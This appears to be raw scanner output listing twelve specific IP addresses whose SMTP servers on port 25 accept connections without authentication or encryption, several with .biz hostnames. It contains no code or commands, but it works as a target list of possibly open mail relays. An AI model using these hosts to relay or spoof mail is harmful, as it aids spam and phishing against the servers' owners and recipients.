216.25.57.21:25 | no auth |  SSL: False | Hostname: m1.go2now.biz
216.25.57.22:25 | no auth |  SSL: False | Hostname: m2.go2now.biz
216.25.57.23:25 | no auth |  SSL: False | Hostname: .
216.25.57.85:25 | no auth |  SSL: False | Hostname: .
216.25.57.86:25 | no auth |  SSL: False | Hostname: .
216.25.57.18:25 | no auth |  SSL: False | Hostname: m2.urlpages.biz
216.25.57.19:25 | no auth |  SSL: False | Hostname: leto1.mypagewiz.biz
216.25.57.87:25 | no auth |  SSL: False | Hostname: .
216.25.57.88:25 | no auth |  SSL: False | Hostname: .
216.25.57.89:25 | no auth |  SSL: False | Hostname: .
216.25.57.90:25 | no auth |  SSL: False | Hostname: out2.prontourl.biz
218.236.59.207:25 | no auth |  SSL: False | Hostname: